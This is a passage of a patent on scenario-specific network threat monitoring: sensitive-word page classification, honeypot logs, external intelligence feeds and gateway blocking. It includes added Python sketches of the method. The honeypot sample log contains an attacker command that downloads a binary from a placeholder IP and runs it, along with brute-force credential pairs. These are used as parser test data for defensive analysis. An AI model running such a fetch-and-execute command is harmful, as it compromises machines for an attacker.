
CN-116170167-B - Network security monitoring method and device, electronic equipment and storage medium


Abstract

The application discloses a network security monitoring method comprising the steps of: obtaining security threat information; screening the obtained security threat information based on the security requirements of a predetermined scenario to obtain security threat information for that scenario; and identifying non-secure network access under the predetermined scenario based on the security threat information for the scenario. The application also discloses a network security monitoring device, electronic equipment, and a storage medium.

Inventors

  • LU YINBING
  • YUAN YONG
  • QIAN CHENG
  • CHEN DONG
  • WANG YUE
  • HE YANG
  • WANG WEIJIE

Assignees

  • 中移(杭州)信息技术有限公司
  • 中国移动通信集团有限公司

Dates

Publication Date
2026-05-08
Application Date
2021-11-25

Claims (18)

  1. A network security monitoring method, comprising: acquiring security threat information; screening the acquired security threat information based on the security requirement of a predetermined scenario to obtain security threat information for the predetermined scenario; and identifying non-secure network access under the predetermined scenario based on the security threat information for the predetermined scenario; wherein acquiring the security threat information comprises: detecting network address information based on sensitive words and determining unsafe network address information; acquiring the security threat information based on an attack log recorded by a preset honeypot; and acquiring security threat information provided by an external platform; wherein screening the security threat information based on the security requirement of the predetermined scenario to obtain the security threat information for the predetermined scenario comprises: determining a plurality of screening detection items based on the security requirement of the predetermined scenario, the screening detection items comprising connectivity, ICP record, page completeness, content compliance, and the detection result of a third-party detection platform; determining security threat information that does not pass at least one of the screening detection items as the security threat information for the predetermined scenario; normalizing the security threat information for the predetermined scenario; and classifying the security threat information for the predetermined scenario, wherein the types of security threat information comprise vulnerability security threat information, network threat security threat information, business security threat information, and security threat information of other industries/vertical fields.
  2. The method of claim 1, wherein detecting network address information based on sensitive words and determining unsafe network address information comprises: acquiring webpage content from the webpage structure corresponding to the network address information to be detected, the webpage content comprising webpage subject content and/or webpage text content; detecting sensitive words in the webpage content; performing security identification, using a preset model, on webpage content that meets the sensitive-word detection condition; and acquiring the network address information corresponding to the webpage content that the preset model identifies as unsafe.
  3. The method of claim 2, wherein the preset model comprises a fastText natural language processing (NLP) model.
  4. The method of claim 1, wherein acquiring the security threat information based on the attack log recorded by the preset honeypot comprises: constructing the honeypot based on the network application environment of the predetermined scenario; deploying a plurality of honeypots, wherein the geographic location and/or cloud server of each honeypot differs; obtaining the attack logs of the plurality of honeypots; and determining the security threat information from the attack logs, wherein the security threat information comprises attack resource information and/or attack mode information.
  5. The method of claim 4, wherein the attack resource information comprises a monitored secure shell (SSH) brute-force dictionary, SSH client information, virus download/distribution server information, and remote control address information; and the attack mode information comprises attack virus sample information, attack command information, and attack impact information.
  6. The method of claim 1, wherein acquiring the security threat information provided by the external platform comprises: crawling security threat information from at least one external platform based on information crawling rules.
  7. The method of claim 6, further comprising: configuring the crawling resources for each external platform based on the priority of that external platform.
  8. The method of any one of claims 1 to 7, wherein identifying non-secure network access under the predetermined scenario based on the security threat information for the predetermined scenario comprises: storing the security threat information for the predetermined scenario in a gateway device, the gateway device identifying non-secure network access under the predetermined scenario based on the stored security threat information for the predetermined scenario.
  9. A network security monitoring device, comprising: an acquisition module for acquiring security threat information; a determining module for screening the acquired security threat information based on the security requirement of a predetermined scenario to obtain security threat information for the predetermined scenario; and an identification module for identifying non-secure network access under the predetermined scenario based on the security threat information for the predetermined scenario; wherein the acquisition module is specifically configured to: detect network address information based on sensitive words and determine unsafe network address information; acquire the security threat information based on an attack log recorded by a preset honeypot; and acquire security threat information provided by an external platform; wherein the determining module is specifically configured to: determine a plurality of screening detection items based on the security requirement of the predetermined scenario, the screening detection items comprising connectivity, ICP record, page completeness, content compliance, and the detection result of a third-party detection platform; and determine security threat information that does not pass at least one of the screening detection items as the security threat information for the predetermined scenario; a first processing module for normalizing the security threat information for the predetermined scenario; and a second processing module for classifying the security threat information for the predetermined scenario, wherein the security threat information comprises vulnerability security threat information, network threat security threat information, business security threat information, and security threat information of other industries/vertical fields.
  10. The device of claim 9, wherein the acquisition module is specifically configured to: acquire webpage content from the webpage structure corresponding to the network address information to be detected, the webpage content comprising webpage subject content and/or webpage text content; detect sensitive words in the webpage content; perform security identification, using a preset model, on webpage content that meets the sensitive-word detection condition; and acquire the network address information corresponding to the webpage content that the preset model identifies as unsafe.
  11. The device of claim 10, wherein the preset model comprises a fastText natural language processing (NLP) model.
  12. The device of claim 11, wherein the acquisition module is specifically configured to: construct the honeypot based on the network application environment of the predetermined scenario; deploy a plurality of honeypots, wherein the geographic location and/or cloud server of each honeypot differs; obtain the attack logs of the plurality of honeypots; and determine the security threat information from the attack logs, wherein the security threat information comprises attack resource information and/or attack mode information.
  13. The device of claim 12, wherein the attack resource information comprises a monitored secure shell (SSH) brute-force dictionary, SSH client information, virus download/distribution server information, and remote control address information; and the attack mode information comprises attack virus sample information, attack command information, and attack impact information.
  14. The device of claim 9, wherein the acquisition module is specifically configured to: crawl security threat information from at least one external platform based on information crawling rules.
  15. The device of claim 14, further comprising: a configuration module for configuring the crawling resources for each external platform based on the priority of that external platform.
  16. The device of any one of claims 9 to 15, wherein the identification module is specifically configured to: store the security threat information for the predetermined scenario in a gateway device, the gateway device identifying non-secure network access under the predetermined scenario based on the stored security threat information for the predetermined scenario.
  17. A storage medium storing an executable program which, when executed by a processor, implements the steps of the network security monitoring method of any one of claims 1 to 8.
  18. An electronic device comprising a memory, a processor, and an executable program stored in the memory and executable by the processor, wherein the processor performs the steps of the network security monitoring method of any one of claims 1 to 8 when it runs the executable program.
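The following Python sketch is an added illustration of claims 1, 4, 5 and 8 and is not the patent's implementation (the page discloses no code). It extracts the attack resource information of claim 5 from constructed honeypot log lines in an assumed key=value format, merges them with a constructed external feed, applies the five screening detection items (constructed lookup sets stand in for live connectivity probes, the ICP registry, page rendering and third-party platforms), keeps only indicators that fail at least one item, normalizes and classifies them, and loads the result into a gateway check that also catches sub-domains of a listed host. The log format, field names, hosts and category mapping are all assumptions of this example.

```python
import re
from urllib.parse import urlsplit

# Constructed honeypot log lines in an assumed key=value format (not any real product's format).
HONEYPOT_LOG = """\
ts=2021-11-25T10:00:01Z hp=hp-sg-1 event=ssh.login.failed src=198.51.100.7 user=root pass=123456 client=SSH-2.0-libssh_0.9.5
ts=2021-11-25T10:00:02Z hp=hp-sg-1 event=ssh.login.failed src=198.51.100.7 user=admin pass=admin client=SSH-2.0-libssh_0.9.5
ts=2021-11-25T10:00:03Z hp=hp-sg-1 event=ssh.login.success src=198.51.100.7 user=root pass=root client=SSH-2.0-libssh_0.9.5
ts=2021-11-25T10:00:05Z hp=hp-sg-1 event=ssh.command src=198.51.100.7 cmd="cd /tmp; wget http://203.0.113.9/bins/x86 -O .x; chmod +x .x; ./.x 203.0.113.10:6667"
ts=2021-11-25T11:00:00Z hp=hp-de-2 event=ssh.login.failed src=198.51.100.8 user=pi pass=raspberry client=SSH-2.0-Go
"""
# Constructed records as an external threat-intelligence platform might deliver them.
EXTERNAL_FEED = [
    {"indicator": "HTTP://Phish-Bank.Example/login", "tag": "phishing"},
    {"indicator": "cve.example.net/2021/router-rce", "tag": "vulnerability"},
    {"indicator": "Shop.Example.", "tag": "generic"},
]
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL = re.compile(r'https?://[^\s;\'"]+')
HOSTPORT = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{2,5})\b')

def parse_honeypot(log):
    """Attack resource information from honeypot logs: SSH brute-force dictionary, SSH client
    banners, malware download servers and remote-control addresses seen in attacker commands."""
    info = {"ssh_dictionary": set(), "ssh_clients": set(), "download_servers": set(), "remote_control": set()}
    for line in log.splitlines():
        ev = {k: v.strip('"') for k, v in KV.findall(line)}
        if ev.get("event", "").startswith("ssh.login"):
            info["ssh_dictionary"].add((ev["user"], ev["pass"]))
            info["ssh_clients"].add(ev["client"])
        elif ev.get("event") == "ssh.command":
            for u in URL.findall(ev["cmd"]):
                info["download_servers"].add(urlsplit(u).hostname)
            for host, port in HOSTPORT.findall(URL.sub("", ev["cmd"])):  # host:port outside any URL
                info["remote_control"].add(f"{host}:{port}")
    return info

def normalize(indicator):
    """Normalization: reduce URL, host:port or bare-domain forms to one lowercase host."""
    s = indicator.strip().lower()
    return (urlsplit(s if "://" in s else "//" + s).hostname or "").rstrip(".")

# Constructed lookup results standing in for the five screening detection items; a live system
# would probe, query the ICP registry, render the page and call third-party platforms instead.
ENV = {
    "reachable": {"203.0.113.9", "203.0.113.10", "phish-bank.example", "cve.example.net", "shop.example"},
    "icp_registered": {"shop.example", "cve.example.net"},
    "complete_page": {"shop.example", "cve.example.net", "phish-bank.example"},
    "compliant_content": {"shop.example", "cve.example.net", "203.0.113.9", "203.0.113.10"},
    "third_party_clean": {"shop.example", "203.0.113.10"},
}
SCREENING_ITEMS = {
    "connectivity": lambda h: h in ENV["reachable"],
    "icp_record": lambda h: h in ENV["icp_registered"],
    "page_completeness": lambda h: h in ENV["complete_page"],
    "content_compliance": lambda h: h in ENV["compliant_content"],
    "third_party_detection": lambda h: h in ENV["third_party_clean"],
}
# Source tag -> one of the four claimed categories (anything else is "other_vertical").
CATEGORY = {"vulnerability": "vulnerability", "download_server": "network_threat",
            "remote_control": "network_threat", "phishing": "business", "fraud": "business"}

def screen(host):
    """Return the screening items the host does not pass; empty means it is filtered out."""
    return [name for name, passes in SCREENING_ITEMS.items() if not passes(host)]

def build_intel(honeypot_log, feed):
    """Acquire from both sources, screen, normalize and classify; returns {host: record}."""
    hp = parse_honeypot(honeypot_log)
    raw = [{"indicator": h, "tag": "download_server", "source": "honeypot"} for h in hp["download_servers"]]
    raw += [{"indicator": a, "tag": "remote_control", "source": "honeypot"} for a in hp["remote_control"]]
    raw += [dict(r, source="external") for r in feed]
    intel = {}
    for r in raw:
        host = normalize(r["indicator"])
        failed = screen(host)
        if failed and host not in intel:  # keep only what fails at least one item; de-duplicate
            intel[host] = {"host": host, "type": CATEGORY.get(r["tag"], "other_vertical"),
                           "source": r["source"], "failed": failed}
    return intel

class Gateway:
    """Holds the scene-specific intel and judges each access by host, walking up the domain
    labels so that sub-domains of a listed host are blocked as well."""
    def __init__(self, intel):
        self.intel = intel
    def check(self, url):
        host = normalize(url)
        labels = host.split(".")
        for i in range(len(labels)):
            hit = self.intel.get(".".join(labels[i:]))
            if hit:
                return ("block", hit["type"], host)
        return ("allow", None, host)

if __name__ == "__main__":
    gw = Gateway(build_intel(HONEYPOT_LOG, EXTERNAL_FEED))
    for u in ("http://Login.Phish-Bank.Example/", "https://shop.example/cart", "tcp://203.0.113.10:6667"):
        print(u, gw.check(u))
```

Two design points worth noting: the screening rule is applied exactly as the claim reads (an indicator that passes every item, here `shop.example`, is dropped, so a noisy feed does not end up on the gateway), and the gateway matches on the normalized host rather than the raw string, because the same indicator arrives as a URL, a host:port pair or a mixed-case domain with a trailing dot from different sources.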

Description

Technical Field

The present invention relates to the field of network security technologies, and in particular to a network security monitoring method, device, electronic apparatus, and storage medium.

Background

At present, the information security risks of home scenarios include harmful-information threats, network security threats, and the like. With respect to harmful information, the internet environment is increasingly complex, and preventing minors in particular from being exposed to unsafe online activities has become an important problem commonly faced by families; such activities jeopardize the physical and mental health of minors. From a protection standpoint, unsafe online activities are short-lived and highly concealed, new ones keep appearing, and they are difficult to discover and intercept. With respect to network security threats, home network devices such as smart home devices combine networking, hardware, and cloud services, so any security vulnerability can lead to the leakage of sensitive private data through the smart home product, or even to the product being used to launch attacks such as distributed denial of service (DDoS) attacks against external targets. From a protection standpoint, because Trojan variants and network attack techniques are so diverse, a user is not promptly detected and notified when a device has been compromised, and vulnerability information is not synchronized to the device immediately after disclosure. Therefore, how to improve the security of network access in home scenarios is a problem to be solved.

Disclosure of Invention

The embodiment of the application provides a network security monitoring method, a network security monitoring device, electronic equipment, and a storage medium.
The technical solution of the embodiment of the application is realized as follows. According to a first aspect of an embodiment of the present application, there is provided a network security monitoring method, including: acquiring security threat information; screening the acquired security threat information based on the security requirement of a predetermined scenario to obtain security threat information for the predetermined scenario; and identifying non-secure network access under the predetermined scenario based on the security threat information for the predetermined scenario.

In one embodiment, acquiring the security threat information includes at least one of: detecting network address information based on sensitive words and determining unsafe network address information; acquiring the security threat information based on an attack log recorded by a preset honeypot; and acquiring security threat information provided by an external platform.

In one embodiment, detecting network address information based on sensitive words and determining unsafe network address information includes: acquiring webpage content from the webpage structure corresponding to the network address information to be detected, the webpage content including webpage subject content and/or webpage text content; detecting sensitive words in the webpage content; performing security identification, using a preset model, on webpage content that meets the sensitive-word detection condition; and acquiring the network address information corresponding to the webpage content that the preset model identifies as unsafe.

In one embodiment, the preset model includes a fastText natural language processing (NLP) model.
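The two-stage sensitive-word detection described above (claims 2 and 3), as an added Python example that is not code from the patent: constructed HTML pages are split into subject content (title, meta description) and body text, keyword hits gate a classifier, and only pages the classifier labels unsafe yield their URL. The patent names a fastText NLP model; because that cannot be trained or loaded offline here, a small multinomial naive Bayes trained on constructed samples stands in for it, which is an assumption of this example, as are the word list, the pages and the example domains.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from math import log

# Constructed sensitive-word list; a deployment would maintain a much larger one per scenario.
SENSITIVE_WORDS = {"gambling", "casino", "jackpot", "bet"}

class PageText(HTMLParser):
    """Split a page into subject content (title, meta description) and body text, skipping script/style."""
    def __init__(self):
        super().__init__()
        self.subject, self.body, self._tag, self._skip = [], [], None, 0
    def handle_starttag(self, tag, attrs):
        self._tag = tag
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "meta":
            a = dict(attrs)
            if a.get("name", "").lower() == "description" and a.get("content"):
                self.subject.append(a["content"])
    def handle_endtag(self, tag):
        self._tag = None
        if tag in ("script", "style"):
            self._skip -= 1
    def handle_data(self, data):
        if not self._skip:
            (self.subject if self._tag == "title" else self.body).append(data)

def extract(html):
    p = PageText()
    p.feed(html)
    p.close()
    return " ".join(p.subject), " ".join(p.body)

def tokens(text):
    return re.findall(r"[a-z0-9']+", text.lower())

def sensitive_hits(subject, body):
    """Stage 1: the cheap keyword screen; pages with no hit never reach the model."""
    return sorted(set(tokens(subject + " " + body)) & SENSITIVE_WORDS)

# Constructed labelled samples; the hard case is a page that *discusses* gambling but is not unsafe.
TRAIN = [
    ("win big tonight casino jackpot free spins bet now deposit bonus", "unsafe"),
    ("online casino bet jackpot sign up bonus slots play now", "unsafe"),
    ("casino bet gambling deposit withdraw win jackpot slots", "unsafe"),
    ("how to talk to teenagers about gambling addiction helpline support", "safe"),
    ("news report regulator fines casino operator for violations", "safe"),
    ("parents guide warning signs of gambling problems in youth counselling", "safe"),
]

class NaiveBayes:
    """Multinomial naive Bayes with add-one smoothing, a stand-in for the patent's fastText model."""
    def __init__(self, samples):
        self.docs, self.counts, self.vocab = Counter(), {}, set()
        for text, label in samples:
            self.docs[label] += 1
            c = self.counts.setdefault(label, Counter())
            for t in tokens(text):
                c[t] += 1
                self.vocab.add(t)
    def predict(self, text):
        scores = {}
        for label, c in self.counts.items():
            denom = sum(c.values()) + len(self.vocab)
            s = log(self.docs[label] / sum(self.docs.values()))
            for t in tokens(text):
                s += log((c[t] + 1) / denom)
            scores[label] = s
        return max(scores, key=scores.get)

def detect_unsafe(url, html, model):
    """Stage 1 then stage 2; returns a record only when the model confirms the page is unsafe."""
    subject, body = extract(html)
    hits = sensitive_hits(subject, body)
    if not hits:
        return None
    verdict = model.predict(subject + " " + body)
    return {"url": url, "hits": hits, "verdict": verdict} if verdict == "unsafe" else None

def unsafe_urls(pages, model):
    """The network address information the method finally emits: URLs of unsafe pages."""
    return [url for url, html in pages.items() if detect_unsafe(url, html, model)]

# Constructed pages keyed by URL (reserved example domains).
PAGES = {
    "http://spin.example/": "<html><head><title>Casino jackpot tonight</title></head><body>"
        "<script>var x = 1;</script><p>Bet now, win big. Deposit bonus, free spins, slots.</p></body></html>",
    "http://help.example/": "<html><head><title>Talking to teenagers about gambling</title>"
        "<meta name='description' content='parents guide'></head><body><p>Warning signs of gambling "
        "problems and a helpline for support and counselling.</p></body></html>",
    "http://news.example/": "<html><head><title>Weather today</title></head><body><p>Sunny, light wind.</p></body></html>",
}

if __name__ == "__main__":
    print(unsafe_urls(PAGES, NaiveBayes(TRAIN)))
```

The point of the second stage is visible in the help page: it trips the keyword screen on "gambling" but the classifier, trained on both promotional and protective samples, labels it safe, so its URL is not added to the unsafe address list. Scripts and styles are excluded from the text so that obfuscated JavaScript does not feed the keyword screen.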
In one embodiment, acquiring the security threat information based on the attack log recorded by the preset honeypot includes: constructing the honeypot based on the network application environment of the predetermined scenario; deploying a plurality of honeypots, wherein the geographic location and/or cloud server of each honeypot differs; obtaining the attack logs of the plurality of honeypots; and determining the security threat information from the attack logs, wherein the security threat information includes attack resource information and/or attack mode information.

In one embodiment, the attack resource information includes a monitored secure shell (SSH) brute-force dictionary, SSH client information, virus download/distribution server information, and remote control address information; the attack mode information includes attack virus sample information, attack command information, and attack impact information.

In one embodiment, acquiring the security threat information provided by the external platform includes: crawling security threat information from at least one external platform based on information crawling rules.

In one embodiment, the method further includes: the crawling resources for each external platform are configu